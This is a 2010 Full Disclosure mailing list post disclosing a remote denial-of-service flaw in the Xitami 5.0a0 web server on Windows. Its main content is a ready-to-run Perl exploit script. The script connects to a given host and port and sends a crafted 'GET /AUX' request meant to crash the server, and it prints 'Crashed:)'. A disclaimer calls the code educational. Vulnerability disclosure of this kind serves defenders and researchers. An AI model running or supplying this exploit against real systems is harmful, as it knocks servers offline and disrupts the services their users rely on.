Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Xitami-5.0a0-windows DOS
From: Usman Saeed <usman () xc0re net>
Date: Mon, 10 May 2010 14:13:39 +0500

###########################################################################################
#
# Name : Xitami/5.0a0 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: 10/05/10
# Tested on Windows 7 !
###########################################################################################

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]

[*] Download Page :http://www.xitami.com


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Description  : By sending a crafted GET request [GET /AUX HTTP/1.1] to
the server ,  the server crashes !


[*] Exploitation :


#!/usr/bin/perl
# Xitami/5.0a0 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = "AUX";


$stuff = "GET /".$packet." HTTP/1.0\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Xitami/5.0a0 Denial Of Service]               +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [10/05/10]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";





exit;
}


$sock = IO::Socket::INET->new( Proto =>  "tcp",PeerAddr  =>  $host , PeerPort  =>  $PORT) || die "Cant connect to 
$host!";
print "+========================================================+\n";
print "+ Program [Xitami/5.0a0 Denial Of Service]               +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [10/05/10]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";




print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin DOS Packet \n";

send ($sock , $stuff , 0);
print "[*] Crashed:)  \n";
$res = recv($sock,$response,1024,0);
print $response;



exit;


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault